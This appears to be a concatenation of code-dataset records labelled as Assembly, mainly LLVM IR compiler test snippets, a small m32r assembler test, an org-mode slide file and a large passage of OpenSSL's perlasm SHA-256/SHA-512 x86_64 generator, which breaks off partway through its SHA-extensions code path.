; CHECK-NEXT: [[MUL:%.*]] = mul i32 [[I:%.*]], -2147483648
; CHECK-NEXT: [[MUL2:%.*]] = add i32 [[MUL]], 1
; CHECK-NEXT: ret i32 [[MUL2]]
;
entry:
%mul = shl nsw i32 %i, 31
%mul2 = add i32 %mul, 1
ret i32 %mul2
}
define i32 @shl_to_mul_nuw(i32 %i) {
;
; CHECK-LABEL: @shl_to_mul_nuw(
; CHECK-NEXT: entry:
; CHECK-NEXT: [[MUL:%.*]] = mul nuw i32 [[I:%.*]], 4
; CHECK-NEXT: [[MUL2:%.*]] = add i32 [[MUL]], 1
; CHECK-NEXT: ret i32 [[MUL2]]
;
entry:
%mul = shl nuw i32 %i, 2
%mul2 = add i32 %mul, 1
ret i32 %mul2
}
define i32 @shl_to_mul_nuw_nsw(i32 %i) {
;
; CHECK-LABEL: @shl_to_mul_nuw_nsw(
; CHECK-NEXT: entry:
; CHECK-NEXT: [[MUL:%.*]] = mul nuw nsw i32 [[I:%.*]], 4
; CHECK-NEXT: [[MUL2:%.*]] = add i32 [[MUL]], 1
; CHECK-NEXT: ret i32 [[MUL2]]
;
entry:
%mul = shl nuw nsw i32 %i, 2
%mul2 = add i32 %mul, 1
ret i32 %mul2
}
define i2 @pr23926(i2 %X1, i2 %X2) {
;
; CHECK-LABEL: @pr23926(
; CHECK-NEXT: [[X1_NEG:%.*]] = sub i2 0, [[X1:%.*]]
; CHECK-NEXT: [[ADD_NEG:%.*]] = add i2 [[X1_NEG]], -1
; CHECK-NEXT: [[SUB:%.*]] = add i2 [[ADD_NEG]], [[X2:%.*]]
; CHECK-NEXT: ret i2 [[SUB]]
;
%add = add nuw i2 %X1, 1
%sub = sub nuw nsw i2 %X2, %add
ret i2 %sub
}
| {
"language": "Assembly"
} |
# m32r testcase for and3 $dr,$sr,#$uimm16
# mach(): m32r m32rx
.include "testutils.inc"
start
.global and3
and3:
mvi_h_gr r4, 0
mvi_h_gr r5, 6
and3 r4, r5, #3
test_h_gr r4, 2
pass
| {
"language": "Assembly"
} |
#+REVEAL_THEME: sky
#+OPTIONS: toc:nil num:nil
#+TITLE: My Awesome Presentation
#+AUTHOR: Mike Zamansky
* Slide 1
here's some text
* Slide 2
** subslide 1
** subslide 2
* Slide 3
#+ATTR_REVEAL: :frag (roll-in)
- list item 1
- list item 2
| a | b | c |
|---+---+---|
| 1 | 2 | 3 |
| 4 | 5 | 6 |
|---+---+---|
* slide 4
#+BEGIN_SRC python
def f(x):
return x + 1
print(f(5))
#+END_SRC
| {
"language": "Assembly"
} |
; RUN: opt < %s -loop-reduce -disable-output
define void @try_swap() {
entry:
br i1 false, label %cond_continue.0.i, label %cond_false.0.i
cond_false.0.i: ; preds = %entry
ret void
cond_continue.0.i: ; preds = %entry
br i1 false, label %cond_continue.1.i, label %cond_false.1.i
cond_false.1.i: ; preds = %cond_continue.0.i
ret void
cond_continue.1.i: ; preds = %cond_continue.0.i
br i1 false, label %endif.3.i, label %else.0.i
endif.3.i: ; preds = %cond_continue.1.i
br i1 false, label %my_irand.exit82, label %endif.0.i62
else.0.i: ; preds = %cond_continue.1.i
ret void
endif.0.i62: ; preds = %endif.3.i
ret void
my_irand.exit82: ; preds = %endif.3.i
br i1 false, label %else.2, label %then.4
then.4: ; preds = %my_irand.exit82
ret void
else.2: ; preds = %my_irand.exit82
br i1 false, label %find_affected_nets.exit, label %loopentry.1.i107.outer.preheader
loopentry.1.i107.outer.preheader: ; preds = %else.2
ret void
find_affected_nets.exit: ; preds = %else.2
br i1 false, label %save_region_occ.exit, label %loopentry.1
save_region_occ.exit: ; preds = %find_affected_nets.exit
br i1 false, label %no_exit.1.preheader, label %loopexit.1
loopentry.1: ; preds = %find_affected_nets.exit
ret void
no_exit.1.preheader: ; preds = %save_region_occ.exit
ret void
loopexit.1: ; preds = %save_region_occ.exit
br i1 false, label %then.10, label %loopentry.3
then.10: ; preds = %loopexit.1
ret void
loopentry.3: ; preds = %endif.16, %loopexit.1
%indvar342 = phi i32 [ %indvar.next343, %endif.16 ], [ 0, %loopexit.1 ] ; <i32> [#uses=2]
br i1 false, label %loopexit.3, label %endif.16
endif.16: ; preds = %loopentry.3
%indvar.next343 = add i32 %indvar342, 1 ; <i32> [#uses=1]
br label %loopentry.3
loopexit.3: ; preds = %loopentry.3
br label %loopentry.4
loopentry.4: ; preds = %loopentry.4, %loopexit.3
%indvar340 = phi i32 [ 0, %loopexit.3 ], [ %indvar.next341, %loopentry.4 ] ; <i32> [#uses=2]
%tmp. = add i32 %indvar340, %indvar342 ; <i32> [#uses=1]
%tmp.526 = load i32*, i32** null ; <i32*> [#uses=1]
%gep.upgrd.1 = zext i32 %tmp. to i64 ; <i64> [#uses=1]
%tmp.528 = getelementptr i32, i32* %tmp.526, i64 %gep.upgrd.1 ; <i32*> [#uses=1]
store i32 0, i32* %tmp.528
%indvar.next341 = add i32 %indvar340, 1 ; <i32> [#uses=1]
br label %loopentry.4
}
| {
"language": "Assembly"
} |
.type b_val, %gnu_unique_object
b_val: .long 0
.size b_val, .-b_val
| {
"language": "Assembly"
} |
; RUN: llvm-dis < %s.bc | FileCheck %s
define void @f2(i32* %x, i32 %y.orig, i32 %z) {
entry:
br label %a
b:
cmpxchg i32* %x, i32 %y, i32 %z acquire acquire
; CHECK: cmpxchg i32* %x, i32 %y, i32 %z acquire acquire
ret void
a:
%y = add i32 %y.orig, 1
br label %a
}
| {
"language": "Assembly"
} |
#!/usr/bin/env perl
#
# ====================================================================
# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
# project. Rights for redistribution and usage in source and binary
# forms are granted according to the OpenSSL license.
# ====================================================================
#
# sha256/512_block procedure for x86_64.
#
# 40% improvement over compiler-generated code on Opteron. On EM64T
# sha256 was observed to run >80% faster and sha512 - >40%. No magical
# tricks, just straight implementation... I really wonder why gcc
# [being armed with inline assembler] fails to generate as fast code.
# The only thing which is cool about this module is that the very
# same instruction sequence is used for both SHA-256 and SHA-512. In
# the former case the instructions operate on 32-bit operands, while in
# the latter on 64-bit ones. All I had to do was get one flavor right,
# the other one passed the test right away:-)
#
# sha256_block runs in ~1005 cycles on Opteron, which gives you
# asymptotic performance of 64*1000/1005=63.7MBps times CPU clock
# frequency in GHz. sha512_block runs in ~1275 cycles, which results
# in 128*1000/1275=100MBps per GHz. Is there room for improvement?
# Well, if you compare it to IA-64 implementation, which maintains
# X[16] in register bank[!], tends to 4 instructions per CPU clock
# cycle and runs in 1003 cycles, 1275 is very good result for 3-way
# issue Opteron pipeline and X[16] maintained in memory. So that *if*
# there is a way to improve it, *then* the only way would be to try to
# offload X[16] updates to SSE unit, but that would require "deeper"
# loop unroll, which in turn would naturally cause size blow-up, not
# to mention increased complexity! And once again, only *if* it's
# actually possible to noticeably improve overall ILP, instruction
# level parallelism, on a given CPU implementation in this case.
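#
# (A side note on the arithmetic quoted above, mine rather than part
# of the original commentary: throughput per GHz is simply
# block_bytes*1000/cycles, e.g.
#	perl -e 'printf "%.1f\n", 64*1000/1005'		# ~63.7 for SHA-256
#	perl -e 'printf "%.1f\n", 128*1000/1275'	# ~100.4 for SHA-512
# with 64 and 128 being the respective block sizes in bytes.)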
#
# Special note on Intel EM64T. While Opteron CPU exhibits perfect
# performance ratio of 1.5 between 64- and 32-bit flavors [see above],
# [currently available] EM64T CPUs apparently are far from it. On the
# contrary, 64-bit version, sha512_block, is ~30% *slower* than 32-bit
# sha256_block:-( This is presumably because 64-bit shifts/rotates
# apparently are not atomic instructions, but implemented in microcode.
#
# May 2012.
#
# Optimization including one of Pavel Semjanov's ideas, alternative
# Maj, resulted in >=5% improvement on most CPUs, +20% SHA256 and
# unfortunately -2% SHA512 on P4 [which nobody should care about
# that much].
#
# June 2012.
#
# Add SIMD code paths, see below for improvement coefficients. SSSE3
# code path was not attempted for SHA512, because improvement is not
# estimated to be high enough, noticeably less than 9%, to justify
# the effort, not on pre-AVX processors. [Obviously with exclusion
# for VIA Nano, but it has SHA512 instruction that is faster and
# should be used instead.] For reference, corresponding estimated
# upper limit for improvement for SSSE3 SHA256 is 28%. The fact that
# higher coefficients are observed on VIA Nano and Bulldozer has more
# to do with specifics of their architecture [which is topic for
# separate discussion].
#
# November 2012.
#
# Add AVX2 code path. Two consecutive input blocks are loaded to
# 256-bit %ymm registers, with data from first block to least
# significant 128-bit halves and data from second to most significant.
# The data is then processed with same SIMD instruction sequence as
# for AVX, but with %ymm as operands. Side effect is increased stack
# frame, 448 additional bytes in SHA256 and 1152 in SHA512, and 1.2KB
# code size increase.
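#
# (An illustrative lane layout implied by the paragraph above, my
# summary rather than the author's, written high:low per register:
#	%ymm = [ words of block N+1 | words of block N ]
# i.e. each "vinserti128 \$1,(%r12),..." below fills the upper 128-bit
# half from the second block while the lower half keeps the first.)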
#
# March 2014.
#
# Add support for Intel SHA Extensions.
######################################################################
# Current performance in cycles per processed byte (less is better):
#
# SHA256 SSSE3 AVX/XOP(*) SHA512 AVX/XOP(*)
#
# AMD K8 14.9 - - 9.57 -
# P4 17.3 - - 30.8 -
# Core 2 15.6 13.8(+13%) - 9.97 -
# Westmere 14.8 12.3(+19%) - 9.58 -
# Sandy Bridge 17.4 14.2(+23%) 11.6(+50%(**)) 11.2 8.10(+38%(**))
# Ivy Bridge 12.6 10.5(+20%) 10.3(+22%) 8.17 7.22(+13%)
# Haswell 12.2 9.28(+31%) 7.80(+56%) 7.66 5.40(+42%)
# Bulldozer 21.1 13.6(+54%) 13.6(+54%(***)) 13.5 8.58(+57%)
# VIA Nano 23.0 16.5(+39%) - 14.7 -
# Atom 23.0 18.9(+22%) - 14.7 -
# Silvermont 27.4 20.6(+33%) - 17.5 -
#
# (*) whichever best applicable;
# (**) switch from ror to shrd stands for fair share of improvement;
# (***) execution time is fully determined by remaining integer-only
# part, body_00_15; reducing the amount of SIMD instructions
# below certain limit makes no difference/sense; to conserve
# space SHA256 XOP code path is therefore omitted;
$flavour = shift;
$output = shift;
if ($flavour =~ /\./) { $output = $flavour; undef $flavour; }
$win64=0; $win64=1 if ($flavour =~ /[nm]asm|mingw64/ || $output =~ /\.asm$/);
$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
( $xlate="${dir}x86_64-xlate.pl" and -f $xlate ) or
( $xlate="${dir}../../perlasm/x86_64-xlate.pl" and -f $xlate) or
die "can't locate x86_64-xlate.pl";
if (`$ENV{CC} -Wa,-v -c -o /dev/null -x assembler /dev/null 2>&1`
=~ /GNU assembler version ([2-9]\.[0-9]+)/) {
$avx = ($1>=2.19) + ($1>=2.22);
}
if (!$avx && $win64 && ($flavour =~ /nasm/ || $ENV{ASM} =~ /nasm/) &&
`nasm -v 2>&1` =~ /NASM version ([2-9]\.[0-9]+)/) {
$avx = ($1>=2.09) + ($1>=2.10);
}
if (!$avx && $win64 && ($flavour =~ /masm/ || $ENV{ASM} =~ /ml64/) &&
`ml64 2>&1` =~ /Version ([0-9]+)\./) {
$avx = ($1>=10) + ($1>=11);
}
if (!$avx && `$ENV{CC} -v 2>&1` =~ /((?:^clang|LLVM) version|based on LLVM) ([3-9]\.[0-9]+)/) {
$avx = ($2>=3.0) + ($2>3.0);
}
$shaext=1; ### set to zero if compiling for 1.0.1
$avx=1 if (!$shaext && $avx);
open OUT,"| \"$^X\" $xlate $flavour $output";
*STDOUT=*OUT;
if ($output =~ /512/) {
$func="sha512_block_data_order";
$TABLE="K512";
$SZ=8;
@ROT=($A,$B,$C,$D,$E,$F,$G,$H)=("%rax","%rbx","%rcx","%rdx",
"%r8", "%r9", "%r10","%r11");
($T1,$a0,$a1,$a2,$a3)=("%r12","%r13","%r14","%r15","%rdi");
@Sigma0=(28,34,39);
@Sigma1=(14,18,41);
@sigma0=(1, 8, 7);
@sigma1=(19,61, 6);
$rounds=80;
} else {
$func="sha256_block_data_order";
$TABLE="K256";
$SZ=4;
@ROT=($A,$B,$C,$D,$E,$F,$G,$H)=("%eax","%ebx","%ecx","%edx",
"%r8d","%r9d","%r10d","%r11d");
($T1,$a0,$a1,$a2,$a3)=("%r12d","%r13d","%r14d","%r15d","%edi");
@Sigma0=( 2,13,22);
@Sigma1=( 6,11,25);
@sigma0=( 7,18, 3);
@sigma1=(17,19,10);
$rounds=64;
}
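# (For reference, my note: the @Sigma*/@sigma* triples above are the
# FIPS 180-4 rotate/shift amounts, e.g. for SHA-256
#	sigma0(x) = ROTR^7(x) ^ ROTR^18(x) ^ SHR^3(x)
# matches @sigma0=(7,18,3); the round subs below derive every ror/shr
# operand from these triples so one code body serves both digests.)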
$ctx="%rdi"; # 1st arg, zapped by $a3
$inp="%rsi"; # 2nd arg
$Tbl="%rbp";
$_ctx="16*$SZ+0*8(%rsp)";
$_inp="16*$SZ+1*8(%rsp)";
$_end="16*$SZ+2*8(%rsp)";
$_rsp="16*$SZ+3*8(%rsp)";
$framesz="16*$SZ+4*8";
sub ROUND_00_15()
{ my ($i,$a,$b,$c,$d,$e,$f,$g,$h) = @_;
my $STRIDE=$SZ;
$STRIDE += 16 if ($i%(16/$SZ)==(16/$SZ-1));
$code.=<<___;
ror \$`$Sigma1[2]-$Sigma1[1]`,$a0
mov $f,$a2
xor $e,$a0
ror \$`$Sigma0[2]-$Sigma0[1]`,$a1
xor $g,$a2 # f^g
mov $T1,`$SZ*($i&0xf)`(%rsp)
xor $a,$a1
and $e,$a2 # (f^g)&e
ror \$`$Sigma1[1]-$Sigma1[0]`,$a0
add $h,$T1 # T1+=h
xor $g,$a2 # Ch(e,f,g)=((f^g)&e)^g
ror \$`$Sigma0[1]-$Sigma0[0]`,$a1
xor $e,$a0
add $a2,$T1 # T1+=Ch(e,f,g)
mov $a,$a2
add ($Tbl),$T1 # T1+=K[round]
xor $a,$a1
xor $b,$a2 # a^b, b^c in next round
ror \$$Sigma1[0],$a0 # Sigma1(e)
mov $b,$h
and $a2,$a3
ror \$$Sigma0[0],$a1 # Sigma0(a)
add $a0,$T1 # T1+=Sigma1(e)
xor $a3,$h # h=Maj(a,b,c)=Ch(a^b,c,b)
add $T1,$d # d+=T1
add $T1,$h # h+=T1
lea $STRIDE($Tbl),$Tbl # round++
___
$code.=<<___ if ($i<15);
add $a1,$h # h+=Sigma0(a)
___
($a2,$a3) = ($a3,$a2);
}
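# (A sketch of the textbook recurrence the interleaved instructions of
# ROUND_00_15 implement, per FIPS 180-4:
#	T1 = h + Sigma1(e) + Ch(e,f,g) + K[i] + W[i]
#	T2 = Sigma0(a) + Maj(a,b,c)
#	d += T1; h = T1 + T2
# with the remaining registers "moved" by rotating @ROT between calls.)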
sub ROUND_16_XX()
{ my ($i,$a,$b,$c,$d,$e,$f,$g,$h) = @_;
$code.=<<___;
mov `$SZ*(($i+1)&0xf)`(%rsp),$a0
mov `$SZ*(($i+14)&0xf)`(%rsp),$a2
mov $a0,$T1
ror \$`$sigma0[1]-$sigma0[0]`,$a0
add $a1,$a # modulo-scheduled h+=Sigma0(a)
mov $a2,$a1
ror \$`$sigma1[1]-$sigma1[0]`,$a2
xor $T1,$a0
shr \$$sigma0[2],$T1
ror \$$sigma0[0],$a0
xor $a1,$a2
shr \$$sigma1[2],$a1
ror \$$sigma1[0],$a2
xor $a0,$T1 # sigma0(X[(i+1)&0xf])
xor $a1,$a2 # sigma1(X[(i+14)&0xf])
add `$SZ*(($i+9)&0xf)`(%rsp),$T1
add `$SZ*($i&0xf)`(%rsp),$T1
mov $e,$a0
add $a2,$T1
mov $a,$a1
___
&ROUND_00_15(@_);
}
$code=<<___;
.text
.extern OPENSSL_ia32cap_P
.globl $func
.type $func,\@function,3
.align 16
$func:
___
$code.=<<___ if ($SZ==4 || $avx);
lea OPENSSL_ia32cap_P(%rip),%r11
mov 0(%r11),%r9d
mov 4(%r11),%r10d
mov 8(%r11),%r11d
___
$code.=<<___ if ($SZ==4 && $shaext);
test \$`1<<29`,%r11d # check for SHA
jnz _shaext_shortcut
___
$code.=<<___ if ($avx && $SZ==8);
test \$`1<<11`,%r10d # check for XOP
jnz .Lxop_shortcut
___
$code.=<<___ if ($avx>1);
and \$`1<<8|1<<5|1<<3`,%r11d # check for BMI2+AVX2+BMI1
cmp \$`1<<8|1<<5|1<<3`,%r11d
je .Lavx2_shortcut
___
$code.=<<___ if ($avx);
and \$`1<<30`,%r9d # mask "Intel CPU" bit
and \$`1<<28|1<<9`,%r10d # mask AVX and SSSE3 bits
or %r9d,%r10d
cmp \$`1<<28|1<<9|1<<30`,%r10d
je .Lavx_shortcut
___
$code.=<<___ if ($SZ==4);
test \$`1<<9`,%r10d
jnz .Lssse3_shortcut
___
$code.=<<___;
push %rbx
push %rbp
push %r12
push %r13
push %r14
push %r15
mov %rsp,%r11 # copy %rsp
shl \$4,%rdx # num*16
sub \$$framesz,%rsp
lea ($inp,%rdx,$SZ),%rdx # inp+num*16*$SZ
and \$-64,%rsp # align stack frame
mov $ctx,$_ctx # save ctx, 1st arg
	mov	$inp,$_inp		# save inp, 2nd arg
mov %rdx,$_end # save end pointer, "3rd" arg
mov %r11,$_rsp # save copy of %rsp
.Lprologue:
mov $SZ*0($ctx),$A
mov $SZ*1($ctx),$B
mov $SZ*2($ctx),$C
mov $SZ*3($ctx),$D
mov $SZ*4($ctx),$E
mov $SZ*5($ctx),$F
mov $SZ*6($ctx),$G
mov $SZ*7($ctx),$H
jmp .Lloop
.align 16
.Lloop:
mov $B,$a3
lea $TABLE(%rip),$Tbl
xor $C,$a3 # magic
___
for($i=0;$i<16;$i++) {
$code.=" mov $SZ*$i($inp),$T1\n";
$code.=" mov @ROT[4],$a0\n";
$code.=" mov @ROT[0],$a1\n";
$code.=" bswap $T1\n";
&ROUND_00_15($i,@ROT);
unshift(@ROT,pop(@ROT));
}
$code.=<<___;
jmp .Lrounds_16_xx
.align 16
.Lrounds_16_xx:
___
for(;$i<32;$i++) {
&ROUND_16_XX($i,@ROT);
unshift(@ROT,pop(@ROT));
}
$code.=<<___;
cmpb \$0,`$SZ-1`($Tbl)
jnz .Lrounds_16_xx
mov $_ctx,$ctx
add $a1,$A # modulo-scheduled h+=Sigma0(a)
lea 16*$SZ($inp),$inp
add $SZ*0($ctx),$A
add $SZ*1($ctx),$B
add $SZ*2($ctx),$C
add $SZ*3($ctx),$D
add $SZ*4($ctx),$E
add $SZ*5($ctx),$F
add $SZ*6($ctx),$G
add $SZ*7($ctx),$H
cmp $_end,$inp
mov $A,$SZ*0($ctx)
mov $B,$SZ*1($ctx)
mov $C,$SZ*2($ctx)
mov $D,$SZ*3($ctx)
mov $E,$SZ*4($ctx)
mov $F,$SZ*5($ctx)
mov $G,$SZ*6($ctx)
mov $H,$SZ*7($ctx)
jb .Lloop
mov $_rsp,%rsi
mov (%rsi),%r15
mov 8(%rsi),%r14
mov 16(%rsi),%r13
mov 24(%rsi),%r12
mov 32(%rsi),%rbp
mov 40(%rsi),%rbx
lea 48(%rsi),%rsp
.Lepilogue:
ret
.size $func,.-$func
___
if ($SZ==4) {
$code.=<<___;
.align 64
.type $TABLE,\@object
$TABLE:
.long 0x428a2f98,0x71374491,0xb5c0fbcf,0xe9b5dba5
.long 0x428a2f98,0x71374491,0xb5c0fbcf,0xe9b5dba5
.long 0x3956c25b,0x59f111f1,0x923f82a4,0xab1c5ed5
.long 0x3956c25b,0x59f111f1,0x923f82a4,0xab1c5ed5
.long 0xd807aa98,0x12835b01,0x243185be,0x550c7dc3
.long 0xd807aa98,0x12835b01,0x243185be,0x550c7dc3
.long 0x72be5d74,0x80deb1fe,0x9bdc06a7,0xc19bf174
.long 0x72be5d74,0x80deb1fe,0x9bdc06a7,0xc19bf174
.long 0xe49b69c1,0xefbe4786,0x0fc19dc6,0x240ca1cc
.long 0xe49b69c1,0xefbe4786,0x0fc19dc6,0x240ca1cc
.long 0x2de92c6f,0x4a7484aa,0x5cb0a9dc,0x76f988da
.long 0x2de92c6f,0x4a7484aa,0x5cb0a9dc,0x76f988da
.long 0x983e5152,0xa831c66d,0xb00327c8,0xbf597fc7
.long 0x983e5152,0xa831c66d,0xb00327c8,0xbf597fc7
.long 0xc6e00bf3,0xd5a79147,0x06ca6351,0x14292967
.long 0xc6e00bf3,0xd5a79147,0x06ca6351,0x14292967
.long 0x27b70a85,0x2e1b2138,0x4d2c6dfc,0x53380d13
.long 0x27b70a85,0x2e1b2138,0x4d2c6dfc,0x53380d13
.long 0x650a7354,0x766a0abb,0x81c2c92e,0x92722c85
.long 0x650a7354,0x766a0abb,0x81c2c92e,0x92722c85
.long 0xa2bfe8a1,0xa81a664b,0xc24b8b70,0xc76c51a3
.long 0xa2bfe8a1,0xa81a664b,0xc24b8b70,0xc76c51a3
.long 0xd192e819,0xd6990624,0xf40e3585,0x106aa070
.long 0xd192e819,0xd6990624,0xf40e3585,0x106aa070
.long 0x19a4c116,0x1e376c08,0x2748774c,0x34b0bcb5
.long 0x19a4c116,0x1e376c08,0x2748774c,0x34b0bcb5
.long 0x391c0cb3,0x4ed8aa4a,0x5b9cca4f,0x682e6ff3
.long 0x391c0cb3,0x4ed8aa4a,0x5b9cca4f,0x682e6ff3
.long 0x748f82ee,0x78a5636f,0x84c87814,0x8cc70208
.long 0x748f82ee,0x78a5636f,0x84c87814,0x8cc70208
.long 0x90befffa,0xa4506ceb,0xbef9a3f7,0xc67178f2
.long 0x90befffa,0xa4506ceb,0xbef9a3f7,0xc67178f2
.long 0x00010203,0x04050607,0x08090a0b,0x0c0d0e0f
.long 0x00010203,0x04050607,0x08090a0b,0x0c0d0e0f
.long 0x03020100,0x0b0a0908,0xffffffff,0xffffffff
.long 0x03020100,0x0b0a0908,0xffffffff,0xffffffff
.long 0xffffffff,0xffffffff,0x03020100,0x0b0a0908
.long 0xffffffff,0xffffffff,0x03020100,0x0b0a0908
.asciz "SHA256 block transform for x86_64, CRYPTOGAMS by <appro\@openssl.org>"
___
} else {
$code.=<<___;
.align 64
.type $TABLE,\@object
$TABLE:
.quad 0x428a2f98d728ae22,0x7137449123ef65cd
.quad 0x428a2f98d728ae22,0x7137449123ef65cd
.quad 0xb5c0fbcfec4d3b2f,0xe9b5dba58189dbbc
.quad 0xb5c0fbcfec4d3b2f,0xe9b5dba58189dbbc
.quad 0x3956c25bf348b538,0x59f111f1b605d019
.quad 0x3956c25bf348b538,0x59f111f1b605d019
.quad 0x923f82a4af194f9b,0xab1c5ed5da6d8118
.quad 0x923f82a4af194f9b,0xab1c5ed5da6d8118
.quad 0xd807aa98a3030242,0x12835b0145706fbe
.quad 0xd807aa98a3030242,0x12835b0145706fbe
.quad 0x243185be4ee4b28c,0x550c7dc3d5ffb4e2
.quad 0x243185be4ee4b28c,0x550c7dc3d5ffb4e2
.quad 0x72be5d74f27b896f,0x80deb1fe3b1696b1
.quad 0x72be5d74f27b896f,0x80deb1fe3b1696b1
.quad 0x9bdc06a725c71235,0xc19bf174cf692694
.quad 0x9bdc06a725c71235,0xc19bf174cf692694
.quad 0xe49b69c19ef14ad2,0xefbe4786384f25e3
.quad 0xe49b69c19ef14ad2,0xefbe4786384f25e3
.quad 0x0fc19dc68b8cd5b5,0x240ca1cc77ac9c65
.quad 0x0fc19dc68b8cd5b5,0x240ca1cc77ac9c65
.quad 0x2de92c6f592b0275,0x4a7484aa6ea6e483
.quad 0x2de92c6f592b0275,0x4a7484aa6ea6e483
.quad 0x5cb0a9dcbd41fbd4,0x76f988da831153b5
.quad 0x5cb0a9dcbd41fbd4,0x76f988da831153b5
.quad 0x983e5152ee66dfab,0xa831c66d2db43210
.quad 0x983e5152ee66dfab,0xa831c66d2db43210
.quad 0xb00327c898fb213f,0xbf597fc7beef0ee4
.quad 0xb00327c898fb213f,0xbf597fc7beef0ee4
.quad 0xc6e00bf33da88fc2,0xd5a79147930aa725
.quad 0xc6e00bf33da88fc2,0xd5a79147930aa725
.quad 0x06ca6351e003826f,0x142929670a0e6e70
.quad 0x06ca6351e003826f,0x142929670a0e6e70
.quad 0x27b70a8546d22ffc,0x2e1b21385c26c926
.quad 0x27b70a8546d22ffc,0x2e1b21385c26c926
.quad 0x4d2c6dfc5ac42aed,0x53380d139d95b3df
.quad 0x4d2c6dfc5ac42aed,0x53380d139d95b3df
.quad 0x650a73548baf63de,0x766a0abb3c77b2a8
.quad 0x650a73548baf63de,0x766a0abb3c77b2a8
.quad 0x81c2c92e47edaee6,0x92722c851482353b
.quad 0x81c2c92e47edaee6,0x92722c851482353b
.quad 0xa2bfe8a14cf10364,0xa81a664bbc423001
.quad 0xa2bfe8a14cf10364,0xa81a664bbc423001
.quad 0xc24b8b70d0f89791,0xc76c51a30654be30
.quad 0xc24b8b70d0f89791,0xc76c51a30654be30
.quad 0xd192e819d6ef5218,0xd69906245565a910
.quad 0xd192e819d6ef5218,0xd69906245565a910
.quad 0xf40e35855771202a,0x106aa07032bbd1b8
.quad 0xf40e35855771202a,0x106aa07032bbd1b8
.quad 0x19a4c116b8d2d0c8,0x1e376c085141ab53
.quad 0x19a4c116b8d2d0c8,0x1e376c085141ab53
.quad 0x2748774cdf8eeb99,0x34b0bcb5e19b48a8
.quad 0x2748774cdf8eeb99,0x34b0bcb5e19b48a8
.quad 0x391c0cb3c5c95a63,0x4ed8aa4ae3418acb
.quad 0x391c0cb3c5c95a63,0x4ed8aa4ae3418acb
.quad 0x5b9cca4f7763e373,0x682e6ff3d6b2b8a3
.quad 0x5b9cca4f7763e373,0x682e6ff3d6b2b8a3
.quad 0x748f82ee5defb2fc,0x78a5636f43172f60
.quad 0x748f82ee5defb2fc,0x78a5636f43172f60
.quad 0x84c87814a1f0ab72,0x8cc702081a6439ec
.quad 0x84c87814a1f0ab72,0x8cc702081a6439ec
.quad 0x90befffa23631e28,0xa4506cebde82bde9
.quad 0x90befffa23631e28,0xa4506cebde82bde9
.quad 0xbef9a3f7b2c67915,0xc67178f2e372532b
.quad 0xbef9a3f7b2c67915,0xc67178f2e372532b
.quad 0xca273eceea26619c,0xd186b8c721c0c207
.quad 0xca273eceea26619c,0xd186b8c721c0c207
.quad 0xeada7dd6cde0eb1e,0xf57d4f7fee6ed178
.quad 0xeada7dd6cde0eb1e,0xf57d4f7fee6ed178
.quad 0x06f067aa72176fba,0x0a637dc5a2c898a6
.quad 0x06f067aa72176fba,0x0a637dc5a2c898a6
.quad 0x113f9804bef90dae,0x1b710b35131c471b
.quad 0x113f9804bef90dae,0x1b710b35131c471b
.quad 0x28db77f523047d84,0x32caab7b40c72493
.quad 0x28db77f523047d84,0x32caab7b40c72493
.quad 0x3c9ebe0a15c9bebc,0x431d67c49c100d4c
.quad 0x3c9ebe0a15c9bebc,0x431d67c49c100d4c
.quad 0x4cc5d4becb3e42b6,0x597f299cfc657e2a
.quad 0x4cc5d4becb3e42b6,0x597f299cfc657e2a
.quad 0x5fcb6fab3ad6faec,0x6c44198c4a475817
.quad 0x5fcb6fab3ad6faec,0x6c44198c4a475817
.quad 0x0001020304050607,0x08090a0b0c0d0e0f
.quad 0x0001020304050607,0x08090a0b0c0d0e0f
.asciz "SHA512 block transform for x86_64, CRYPTOGAMS by <appro\@openssl.org>"
___
}
######################################################################
# SIMD code paths
#
if ($SZ==4 && $shaext) {{{
######################################################################
# Intel SHA Extensions implementation of SHA256 update function.
#
my ($ctx,$inp,$num,$Tbl)=("%rdi","%rsi","%rdx","%rcx");
my ($Wi,$ABEF,$CDGH,$TMP,$BSWAP,$ABEF_SAVE,$CDGH_SAVE)=map("%xmm$_",(0..2,7..10));
my @MSG=map("%xmm$_",(3..6));
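# A note for readers new to SHA-NI, my summary rather than the original
# author's: sha256rnds2 retires two rounds per issue and takes its two
# W[i]+K[i] inputs from the low quadword of the implicit %xmm0 ($Wi
# here), which is why each four-round group below loads $Wi once and
# uses "pshufd \$0x0e" to move the upper pair down before the second
# sha256rnds2 of the group.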
$code.=<<___;
.type sha256_block_data_order_shaext,\@function,3
.align 64
sha256_block_data_order_shaext:
_shaext_shortcut:
___
$code.=<<___ if ($win64);
lea `-8-5*16`(%rsp),%rsp
movaps %xmm6,-8-5*16(%rax)
movaps %xmm7,-8-4*16(%rax)
movaps %xmm8,-8-3*16(%rax)
movaps %xmm9,-8-2*16(%rax)
movaps %xmm10,-8-1*16(%rax)
.Lprologue_shaext:
___
$code.=<<___;
lea K256+0x80(%rip),$Tbl
movdqu ($ctx),$ABEF # DCBA
movdqu 16($ctx),$CDGH # HGFE
movdqa 0x200-0x80($Tbl),$TMP # byte swap mask
pshufd \$0x1b,$ABEF,$Wi # ABCD
pshufd \$0xb1,$ABEF,$ABEF # CDAB
pshufd \$0x1b,$CDGH,$CDGH # EFGH
movdqa $TMP,$BSWAP # offload
palignr \$8,$CDGH,$ABEF # ABEF
punpcklqdq $Wi,$CDGH # CDGH
jmp .Loop_shaext
.align 16
.Loop_shaext:
movdqu ($inp),@MSG[0]
movdqu 0x10($inp),@MSG[1]
movdqu 0x20($inp),@MSG[2]
pshufb $TMP,@MSG[0]
movdqu 0x30($inp),@MSG[3]
movdqa 0*32-0x80($Tbl),$Wi
paddd @MSG[0],$Wi
pshufb $TMP,@MSG[1]
movdqa $CDGH,$CDGH_SAVE # offload
sha256rnds2 $ABEF,$CDGH # 0-3
pshufd \$0x0e,$Wi,$Wi
nop
movdqa $ABEF,$ABEF_SAVE # offload
sha256rnds2 $CDGH,$ABEF
movdqa 1*32-0x80($Tbl),$Wi
paddd @MSG[1],$Wi
pshufb $TMP,@MSG[2]
sha256rnds2 $ABEF,$CDGH # 4-7
pshufd \$0x0e,$Wi,$Wi
lea 0x40($inp),$inp
sha256msg1 @MSG[1],@MSG[0]
sha256rnds2 $CDGH,$ABEF
movdqa 2*32-0x80($Tbl),$Wi
paddd @MSG[2],$Wi
pshufb $TMP,@MSG[3]
sha256rnds2 $ABEF,$CDGH # 8-11
pshufd \$0x0e,$Wi,$Wi
